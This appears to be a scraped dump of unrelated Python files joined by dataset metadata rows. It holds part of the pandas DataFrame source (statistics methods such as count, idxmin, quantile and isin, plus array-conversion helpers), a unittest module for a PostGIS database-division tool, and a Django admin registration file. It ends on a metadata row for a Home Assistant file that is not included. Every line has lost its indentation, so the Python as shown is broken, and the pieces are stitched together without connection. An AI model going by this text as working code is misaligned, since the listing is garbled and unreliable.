# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
"""
Count non-NA cells for each column or row.
The values `None`, `NaN`, `NaT`, and optionally `numpy.inf` (depending
on `pandas.options.mode.use_inf_as_na`) are considered NA.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
If 0 or 'index' counts are generated for each column.
If 1 or 'columns' counts are generated for each **row**.
level : int or str, optional
If the axis is a `MultiIndex` (hierarchical), count along a
particular `level`, collapsing into a `DataFrame`.
A `str` specifies the level name.
numeric_only : boolean, default False
Include only `float`, `int` or `boolean` data.
Returns
-------
Series or DataFrame
For each column/row the number of non-NA/null entries.
If `level` is specified returns a `DataFrame`.
See Also
--------
Series.count: number of non-NA elements in a Series
DataFrame.shape: number of DataFrame rows and columns (including NA
elements)
DataFrame.isna: boolean same-sized DataFrame showing places of NA
elements
Examples
--------
Constructing DataFrame from a dictionary:
>>> df = pd.DataFrame({"Person":
... ["John", "Myla", None, "John", "Myla"],
... "Age": [24., np.nan, 21., 33, 26],
... "Single": [False, True, True, True, False]})
>>> df
Person Age Single
0 John 24.0 False
1 Myla NaN True
2 None 21.0 True
3 John 33.0 True
4 Myla 26.0 False
Notice the uncounted NA values:
>>> df.count()
Person 4
Age 4
Single 5
dtype: int64
Counts for each **row**:
>>> df.count(axis='columns')
0 3
1 2
2 2
3 3
4 3
dtype: int64
Counts for one level of a `MultiIndex`:
>>> df.set_index(["Person", "Single"]).count(level="Person")
Age
Person
John 2
Myla 1
"""
axis = self._get_axis_number(axis)
if level is not None:
return self._count_level(level, axis=axis,
numeric_only=numeric_only)
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
# GH #423
if len(frame._get_axis(axis)) == 0:
result = Series(0, index=frame._get_agg_axis(axis))
else:
if frame._is_mixed_type or frame._data.any_extension_types:
# the or any_extension_types is really only hit for single-
# column frames with an extension array
result = notna(frame).sum(axis=axis)
else:
# GH13407
series_counts = notna(frame).sum(axis=axis)
counts = series_counts.values
result = Series(counts, index=frame._get_agg_axis(axis))
return result.astype('int64')
def _count_level(self, level, axis=0, numeric_only=False):
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
count_axis = frame._get_axis(axis)
agg_axis = frame._get_agg_axis(axis)
if not isinstance(count_axis, MultiIndex):
raise TypeError("Can only count levels on hierarchical %s." %
self._get_axis_name(axis))
if frame._is_mixed_type:
# Since we have mixed types, calling notna(frame.values) might
# upcast everything to object
mask = notna(frame).values
else:
# But use the speedup when we have homogeneous dtypes
mask = notna(frame.values)
if axis == 1:
# We're transposing the mask rather than frame to avoid potential
# upcasts to object, which induces a ~20x slowdown
mask = mask.T
if isinstance(level, compat.string_types):
level = count_axis._get_level_number(level)
level_index = count_axis.levels[level]
labels = _ensure_int64(count_axis.labels[level])
counts = lib.count_level_2d(mask, labels, len(level_index), axis=0)
result = DataFrame(counts, index=level_index, columns=agg_axis)
if axis == 1:
# Undo our earlier transpose
return result.T
else:
return result
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
axis = self._get_axis_number(axis)
def f(x):
return op(x, axis=axis, skipna=skipna, **kwds)
labels = self._get_agg_axis(axis)
# exclude timedelta/datetime unless we are uniform types
if axis == 1 and self._is_mixed_type and self._is_datelike_mixed_type:
numeric_only = True
if numeric_only is None:
try:
values = self.values
result = f(values)
except Exception as e:
# try by-column first
if filter_type is None and axis == 0:
try:
# this can end up with a non-reduction
# but not always. if the types are mixed
# with datelike then need to make sure a series
# we only end up here if we have not specified
# numeric_only and yet we have tried a
# column-by-column reduction, where we have mixed type.
# So let's just do what we can
from pandas.core.apply import frame_apply
opa = frame_apply(self,
func=f,
result_type='expand',
ignore_failures=True)
result = opa.get_result()
if result.ndim == self.ndim:
result = result.iloc[0]
return result
except Exception:
pass
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
e = NotImplementedError("Handling exception with filter_"
"type %s not implemented." %
filter_type)
raise_with_traceback(e)
with np.errstate(all='ignore'):
result = f(data.values)
labels = data._get_agg_axis(axis)
else:
if numeric_only:
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
msg = ("Generating numeric_only data with filter_type %s"
"not supported." % filter_type)
raise NotImplementedError(msg)
values = data.values
labels = data._get_agg_axis(axis)
else:
values = self.values
result = f(values)
if hasattr(result, 'dtype') and is_object_dtype(result.dtype):
try:
if filter_type is None or filter_type == 'numeric':
result = result.astype(np.float64)
elif filter_type == 'bool' and notna(result).all():
result = result.astype(np.bool_)
except (ValueError, TypeError):
# try to coerce to the original dtypes item by item if we can
if axis == 0:
result = coerce_to_dtypes(result, self.dtypes)
return Series(result, index=labels)
def nunique(self, axis=0, dropna=True):
"""
Return Series with number of distinct observations over requested
axis.
.. versionadded:: 0.20.0
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
dropna : boolean, default True
Don't include NaN in the counts.
Returns
-------
nunique : Series
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
>>> df.nunique()
A 3
B 1
>>> df.nunique(axis=1)
0 1
1 2
2 2
"""
return self.apply(Series.nunique, axis=axis, dropna=dropna)
def idxmin(self, axis=0, skipna=True):
"""
Return index of first occurrence of minimum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmin : Series
Notes
-----
This method is the DataFrame version of ``ndarray.argmin``.
See Also
--------
Series.idxmin
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True):
"""
Return index of first occurrence of maximum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmax : Series
Notes
-----
This method is the DataFrame version of ``ndarray.argmax``.
See Also
--------
Series.idxmax
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num):
""" let's be explicit about this """
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError('Axis must be 0 or 1 (got %r)' % axis_num)
def mode(self, axis=0, numeric_only=False):
"""
Gets the mode(s) of each element along the axis selected. Adds a row
for each mode per label, fills in gaps with nan.
Note that there could be multiple values returned for the selected
axis (when more than one item share the maximum frequency), which is
the reason why a dataframe is returned. If you want to impute missing
values with the mode in a dataframe ``df``, you can just do this:
``df.fillna(df.mode().iloc[0])``
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
* 0 or 'index' : get mode of each column
* 1 or 'columns' : get mode of each row
numeric_only : boolean, default False
if True, only apply to numeric columns
Returns
-------
modes : DataFrame (sorted)
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 1, 2, 1, 2, 3]})
>>> df.mode()
A
0 1
1 2
"""
data = self if not numeric_only else self._get_numeric_data()
def f(s):
return s.mode()
return data.apply(f, axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True,
interpolation='linear'):
"""
Return values at the given quantile over requested axis, a la
numpy.percentile.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
0 <= q <= 1, the quantile(s) to compute
axis : {0, 1, 'index', 'columns'} (default 0)
0 or 'index' for row-wise, 1 or 'columns' for column-wise
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
.. versionadded:: 0.18.0
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
quantiles : Series or DataFrame
- If ``q`` is an array, a DataFrame will be returned where the
index is ``q``, the columns are the columns of self, and the
values are the quantiles.
- If ``q`` is a float, a Series will be returned where the
index is the columns of self and the values are the quantiles.
Examples
--------
>>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
columns=['a', 'b'])
>>> df.quantile(.1)
a 1.3
b 3.7
dtype: float64
>>> df.quantile([.1, .5])
a b
0.1 1.3 3.7
0.5 2.5 55.0
"""
self._check_percentile(q)
data = self._get_numeric_data() if numeric_only else self
axis = self._get_axis_number(axis)
is_transposed = axis == 1
if is_transposed:
data = data.T
result = data._data.quantile(qs=q,
axis=1,
interpolation=interpolation,
transposed=is_transposed)
if result.ndim == 2:
result = self._constructor(result)
else:
result = self._constructor_sliced(result, name=q)
if is_transposed:
result = result.T
return result
def to_timestamp(self, freq=None, how='start', axis=0, copy=True):
"""
Cast to DatetimeIndex of timestamps, at *beginning* of period
Parameters
----------
freq : string, default frequency of PeriodIndex
Desired frequency
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If false then underlying input data is not copied
Returns
-------
df : DataFrame with DatetimeIndex
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_timestamp(freq=freq, how=how))
elif axis == 1:
new_data.set_axis(0, self.columns.to_timestamp(freq=freq, how=how))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def to_period(self, freq=None, axis=0, copy=True):
"""
Convert DataFrame from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed)
Parameters
----------
freq : string, default
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If False then underlying input data is not copied
Returns
-------
ts : TimeSeries with PeriodIndex
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_period(freq=freq))
elif axis == 1:
new_data.set_axis(0, self.columns.to_period(freq=freq))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def isin(self, values):
"""
Return boolean DataFrame showing whether each element in the
DataFrame is contained in values.
Parameters
----------
values : iterable, Series, DataFrame or dictionary
The result will only be true at a location if all the
labels match. If `values` is a Series, that's the index. If
`values` is a dictionary, the keys must be the column names,
which must match. If `values` is a DataFrame,
then both the index and column labels must match.
Returns
-------
DataFrame of booleans
Examples
--------
When ``values`` is a list:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> df.isin([1, 3, 12, 'a'])
A B
0 True True
1 False False
2 True False
When ``values`` is a dict:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 4, 7]})
>>> df.isin({'A': [1, 3], 'B': [4, 7, 12]})
A B
0 True False # Note that B didn't match the 1 here.
1 False True
2 True True
When ``values`` is a Series or DataFrame:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> other = DataFrame({'A': [1, 3, 3, 2], 'B': ['e', 'f', 'f', 'e']})
>>> df.isin(other)
A B
0 True False
1 False False # Column A in `other` has a 3, but not at index 1.
2 True True
"""
if isinstance(values, dict):
from pandas.core.reshape.concat import concat
values = collections.defaultdict(list, values)
return concat((self.iloc[:, [i]].isin(values[col])
for i, col in enumerate(self.columns)), axis=1)
elif isinstance(values, Series):
if not values.index.is_unique:
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self), axis='index')
elif isinstance(values, DataFrame):
if not (values.columns.is_unique and values.index.is_unique):
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self))
else:
if not is_list_like(values):
raise TypeError("only list-like or dict-like objects are "
"allowed to be passed to DataFrame.isin(), "
"you passed a "
"{0!r}".format(type(values).__name__))
return DataFrame(
algorithms.isin(self.values.ravel(),
values).reshape(self.shape), self.index,
self.columns)
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
plot = CachedAccessor("plot", gfx.FramePlotMethods)
hist = gfx.hist_frame
boxplot = gfx.boxplot_frame
DataFrame._setup_axes(['index', 'columns'], info_axis=1, stat_axis=0,
axes_are_reversed=True, aliases={'rows': 0},
docs={
'index': 'The index (row labels) of the DataFrame.',
'columns': 'The column labels of the DataFrame.'})
DataFrame._add_numeric_operations()
DataFrame._add_series_or_dataframe_operations()
ops.add_flex_arithmetic_methods(DataFrame)
ops.add_special_arithmetic_methods(DataFrame)
def _arrays_to_mgr(arrays, arr_names, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
# figure out the index, if necessary
if index is None:
index = extract_index(arrays)
else:
index = _ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# from BlockManager perspective
axes = [_ensure_index(columns), _ensure_index(index)]
return create_block_manager_from_arrays(arrays, arr_names, axes)
def extract_index(data):
from pandas.core.index import _union_indexes
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
indexes = []
have_raw_arrays = False
have_series = False
have_dicts = False
for v in data:
if isinstance(v, Series):
have_series = True
indexes.append(v.index)
elif isinstance(v, dict):
have_dicts = True
indexes.append(list(v.keys()))
elif is_list_like(v) and getattr(v, 'ndim', 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(v))
if not indexes and not raw_lengths:
raise ValueError('If using all scalar values, you must pass'
' an index')
if have_series or have_dicts:
index = _union_indexes(indexes)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('arrays must all be same length')
if have_dicts:
raise ValueError('Mixing dicts with non-Series may lead to '
'ambiguous ordering.')
if have_series:
if lengths[0] != len(index):
msg = ('array length %d does not match index length %d' %
(lengths[0], len(index)))
raise ValueError(msg)
else:
index = com._default_index(lengths[0])
return _ensure_index(index)
def _prep_ndarray(values, copy=True):
if not isinstance(values, (np.ndarray, Series, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
def convert(v):
return maybe_convert_platform(v)
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
try:
if is_list_like(values[0]) or hasattr(values[0], 'len'):
values = np.array([convert(v) for v in values])
else:
values = convert(values)
except:
values = convert(values)
else:
# drop subclass info, do not copy data
values = np.asarray(values)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError('Must pass 2-d input')
return values
def _to_arrays(data, columns, coerce_float=False, dtype=None):
"""
Return list of arrays, columns
"""
if isinstance(data, DataFrame):
if columns is not None:
arrays = [data._ixs(i, axis=1).values
for i, col in enumerate(data.columns) if col in columns]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
columns = data.dtype.names
if columns is not None:
return [[]] * len(columns), columns
return [], [] # columns if columns is not None else []
if isinstance(data[0], (list, tuple)):
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], collections.Mapping):
return _list_of_dict_to_arrays(data, columns,
coerce_float=coerce_float, dtype=dtype)
elif isinstance(data[0], Series):
return _list_of_series_to_arrays(data, columns,
coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], Categorical):
if columns is None:
columns = com._default_index(len(data))
return data, columns
elif (isinstance(data, (np.ndarray, Series, Index)) and
data.dtype.names is not None):
columns = list(data.dtype.names)
arrays = [data[k] for k in columns]
return arrays, columns
else:
# last ditch effort
data = lmap(tuple, data)
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
def _masked_rec_array_to_mgr(data, index, columns, dtype, copy):
""" extract from a masked rec array and create the manager """
# essentially process a record array then fill it
fill_value = data.fill_value
fdata = ma.getdata(data)
if index is None:
index = _get_names_from_index(fdata)
if index is None:
index = com._default_index(len(data))
index = _ensure_index(index)
if columns is not None:
columns = _ensure_index(columns)
arrays, arr_columns = _to_arrays(fdata, columns)
# fill if needed
new_arrays = []
for fv, arr, col in zip(fill_value, arrays, arr_columns):
mask = ma.getmaskarray(data[col])
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
# create the manager
arrays, arr_columns = _reorder_arrays(new_arrays, arr_columns, columns)
if columns is None:
columns = arr_columns
mgr = _arrays_to_mgr(arrays, arr_columns, index, columns)
if copy:
mgr = mgr.copy()
return mgr
def _reorder_arrays(arrays, arr_columns, columns):
# reorder according to the columns
if (columns is not None and len(columns) and arr_columns is not None and
len(arr_columns)):
indexer = _ensure_index(arr_columns).get_indexer(columns)
arr_columns = _ensure_index([arr_columns[i] for i in indexer])
arrays = [arrays[i] for i in indexer]
return arrays, arr_columns
def _list_to_arrays(data, columns, coerce_float=False, dtype=None):
if len(data) > 0 and isinstance(data[0], tuple):
content = list(lib.to_object_array_tuples(data).T)
else:
# list of lists
content = list(lib.to_object_array(data).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _list_of_series_to_arrays(data, columns, coerce_float=False, dtype=None):
from pandas.core.index import _get_objs_combined_axis
if columns is None:
columns = _get_objs_combined_axis(data)
indexer_cache = {}
aligned_values = []
for s in data:
index = getattr(s, 'index', None)
if index is None:
index = com._default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = com._values_from_object(s)
aligned_values.append(algorithms.take_1d(values, indexer))
values = np.vstack(aligned_values)
if values.dtype == np.object_:
content = list(values.T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
else:
return values.T, columns
def _list_of_dict_to_arrays(data, columns, coerce_float=False, dtype=None):
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, OrderedDict) for d in data)
columns = lib.fast_unique_multiple_list_gen(gen, sort=sort)
# assure that they are of the base dict class and not of derived
# classes
data = [(type(d) is dict) and d or dict(d) for d in data]
content = list(lib.dicts_to_array(data, list(columns)).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _convert_object_array(content, columns, coerce_float=False, dtype=None):
if columns is None:
columns = com._default_index(len(content))
else:
if len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError('%d columns passed, passed data had %s '
'columns' % (len(columns), len(content)))
# provide soft conversion of object dtypes
def convert(arr):
if dtype != object and dtype != np.object:
arr = lib.maybe_convert_objects(arr, try_float=coerce_float)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays, columns
def _get_names_from_index(data):
has_some_name = any(getattr(s, 'name', None) is not None for s in data)
if not has_some_name:
return com._default_index(len(data))
index = lrange(len(data))
count = 0
for i, s in enumerate(data):
n = getattr(s, 'name', None)
if n is not None:
index[i] = n
else:
index[i] = 'Unnamed %d' % count
count += 1
return index
def _homogenize(data, index, dtype=None):
from pandas.core.series import _sanitize_array
oindex = None
homogenized = []
for v in data:
if isinstance(v, Series):
if dtype is not None:
v = v.astype(dtype)
if v.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
v = v.reindex(index, copy=False)
else:
if isinstance(v, dict):
if oindex is None:
oindex = index.astype('O')
if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
v = com._dict_compat(v)
else:
v = dict(v)
v = lib.fast_multiget(v, oindex.values, default=np.nan)
v = _sanitize_array(v, index, dtype=dtype, copy=False,
raise_cast_failure=False)
homogenized.append(v)
return homogenized
def _from_nested_dict(data):
# TODO: this should be seriously cythonized
new_data = OrderedDict()
for index, s in compat.iteritems(data):
for col, v in compat.iteritems(s):
new_data[col] = new_data.get(col, OrderedDict())
new_data[col][index] = v
return new_data
def _put_str(s, space):
return ('%s' % s)[:space].ljust(space)
| 36.400185 | 85 | 0.532237 |
ace975af5dcfcbe1bb195bd607db5f110a522925 | 7,335 | py | Python | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | tests/db_division_tests/db_division_test.py | cabesuon/ideuy_controls | 508217725ffd4993d574acec6ea9d80c0401591a | [
"MIT"
] | null | null | null | """Module that contains the unit tests for division_bd.py.
Examples:
$python -m unittest db_division_test.py
"""
import unittest
import sys
import os
# add top level package to path
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from controls.db_division.main import ( # pylint: disable=import-error, C0413
db_connect, create_consignments_table, convert_consignments_srid, get_consignments,
create_schema, get_tables_from_original_schema, create_table, load_data
)
class TestDividisionBD(unittest.TestCase):
"""Class to manage unit test of division_bd methods.
Attributes:
host: database host
port: database port
db: database name
user: database user
password: database password
"""
def setUp(self):
"""Unit test setup."""
self.host = 'localhost'
self.port = 5432
self.db = 'test_db_division'
self.user = 'test_user'
self.password = 'test_password'
def test_db_connect(self):
"""Unit test of db_connection function."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
self.assertIsNotNone(conn)
with conn.cursor() as c:
self.assertIsNotNone(c)
def test_get_tables_from_original_schema(self):
"""Unit test of get_tables_from_original_schema function."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
tables_all = get_tables_from_original_schema(c, 'cartografia_nacional_hidrografia')
self.assertEqual(tables_all, [('agua_a', ), ('agua_estancada_desconocida_a', ),
('area_humeda_a', )])
def test_create_consignments_table(self):
"""Unit test of create_consignments_table procedure."""
# create table for querying consignments
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
tables_all = get_tables_from_original_schema(c, 'cartografia_nacional_hidrografia')
sql_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
'controls', 'db_division', 'files', 'Remesa_Nacional.sql')
create_consignments_table(c, 'public', 'remesa_nacional', sql_file, 'cartografia_nacional_hidrografia', tables_all)
statement = 'SELECT COUNT(*) FROM public.remesa_nacional;'
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 12)
def test_get_consignments(self):
"""Unit test of create_consignments_table function."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
tables_all = get_tables_from_original_schema(c, 'cartografia_nacional_hidrografia')
sql_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))), 'controls', 'db_division', 'files', 'Remesa_Nacional.sql')
create_consignments_table(c, 'public', 'remesa_nacional', sql_file, 'cartografia_nacional_hidrografia', tables_all)
consignments = get_consignments(c, 'public', 'remesa_nacional')
self.assertEqual(len(consignments), 12)
def test_convert_consignments_srid(self):
"""Unit test of convert_consignments_srid procedure."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
tables_all = get_tables_from_original_schema(c, 'cartografia_nacional_hidrografia')
sql_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))), 'controls', 'db_division', 'files', 'Remesa_Nacional.sql')
create_consignments_table(c, 'public', 'remesa_nacional', sql_file, 'cartografia_nacional_hidrografia', tables_all)
# change SRID to 5381
statement = 'ALTER TABLE public.remesa_nacional\
ALTER COLUMN geom TYPE geometry(MultiPolygon, 5381)\
USING ST_Transform(geom, 5381);'
c.execute(statement)
# checking if SRID whas correctly changed
statement = "SELECT Find_SRID('public', 'remesa_nacional', 'geom');"
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 5381)
# convert SRID and check
convert_consignments_srid(c, 'public', 'remesa_nacional', 'cartografia_nacional_hidrografia', tables_all)
statement = "SELECT Find_SRID('public', 'remesa_nacional', 'geom');"
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 31981)
def test_create_schema(self):
"""Unit test of create_schema function."""
# create schema for the new consignment - id = rn01
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
# delete schema if exists
statement = 'DROP SCHEMA IF EXISTS rn01 CASCADE'
c.execute(statement)
# create new schema
consignment_id = 1
schema_new = create_schema(c, 'public', 'rn', consignment_id)
statement = "SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name = '" + schema_new + "'"
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 1)
def test_create_table(self):
"""Unit test of create_table procedure."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
table_original = 'cartografia_nacional_hidrografia.agua_estancada_desconocida_a'
table_new = 'rn01.agua_estancada_desconocida_a'
create_table(c, table_original, table_new)
statement = "SELECT COUNT(*) FROM information_schema.tables WHERE table_schema = 'rn01'AND table_name = 'agua_estancada_desconocida_a'"
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 1)
def test_load_data(self):
"""Unit test of load_data procedure."""
conn = db_connect(self.host, self.port, self.db, self.user, self.password)
with conn.cursor() as c:
consignment_id = 1
table_name = 'agua_estancada_desconocida_a'
table_original = 'cartografia_nacional_hidrografia.agua_estancada_desconocida_a'
table_new = 'rn01.agua_estancada_desconocida_a'
load_data(c, 'public', 'remesa_nacional', consignment_id, table_name, table_original, table_new)
statement = "SELECT COUNT(*) FROM rn01.agua_estancada_desconocida_a"
c.execute(statement)
rows = c.fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], 4455)
if __name__ == "__main__":
unittest.main()
| 49.228188 | 173 | 0.650307 |
ace977ad3a276845b4b652cfd30d602be0635d6a | 3,088 | py | Python | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | null | null | null | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | null | null | null | faravdms/vdms/admin.py | samcodesio/faravdms_active | cab6e8973db074c287da97afbfe739e23e4b1f35 | [
"Apache-2.0"
] | 1 | 2021-12-21T16:39:20.000Z | 2021-12-21T16:39:20.000Z |
from django.contrib import admin
from .models import Category, ProviderInfo, Certificates, SubCategory, SendEmail, Consultant
from django.core.exceptions import ValidationError
from django import forms
from django.db.models.signals import m2m_changed
from import_export.admin import ImportExportModelAdmin
from .resources import *
from import_export import resources
# # Register your models here.
# admin.site.register(Goods)
# admin.site.register(Consultancy)
# admin.site.register(Nonconsultancy)
admin.site.register(Category)
admin.site.register(SubCategory)
# admin.site.register(ProviderInfo)
admin.site.register(Certificates)
admin.site.register(SendEmail)
admin.site.register(Consultant)
# admin.site.register(User)
# class ProviderForm(forms.ModelForm):
# model = ProviderInfo
# def clean(self):
# cleaned_data = super().clean()
# if cleaned_data.get('category').count() >= 3:
# raise ValidationError('You can only choose 2 categories for the field Category!')
# @admin.register(ProviderInfo)
# class QuestionAdmin(admin.ModelAdmin):
# form = ProviderForm
# def category_changed(sender, **kwargs):
# if kwargs['instance'].category.count() > 3:
# raise ValidationError("You can't assign more than two categories")
# m2m_changed.connect(category_changed, sender=ProviderInfo.category.through)
# from django import forms
# class ProvidersResource(resources.ModelResource):
# category = fields.Field(
# attribute = 'category',
# widget = widgets.ManyToManyWidget(Category, field='category_name',seperator='|')
# )
# class meta:
# model = ProviderInfo
@admin.register(ProviderInfo)
class ProviderAdmin(ImportExportModelAdmin):
resource_class = ProvidersResource
fields = ['category', 'no_of_categories', 'sub_categories', 'company_name', 'postal_address', 'email_address',
'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration', 'classification']
list_display = ['get_categories', 'no_of_categories', 'get_subcategories', 'company_name', 'postal_address', 'email_address',
'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration', 'classification']
# def get_categories(self):
# return "\n".join([b.category_name for b in self.category.all()])
# def get_subcategories(self):
# return "\n".join([s.sub_category_name for s in self.sub_categories.all()])
# admin.site.register(ProviderInfo, ProviderAdmin)
# Working
# @admin.register(Category)
# class CategoryAdmin(ImportExportModelAdmin):
# resource_class = ProvidersResource
# # fields = ['id','get_categories', 'no_of_categories', 'get_subcategories', 'company_name', 'postal_address', 'email_address',
# # 'altemail_address', 'contact', 'altcontact', 'country', 'local_area', 'type_of_firm', 'date_of_registration','classification']
# list_display = ('category_name', 'category_code', 'category_description',)
| 36.761905 | 151 | 0.723446 |
ace977ca35661ce9e1394db4c4face6c9cf74c7a | 5,641 | py | Python | homeassistant/components/rainmachine/binary_sensor.py | dnguyen800/home-assistant | 353a0144960dcb7c4f6b81459f76937ce078c1a8 | [
"Apache-2.0"
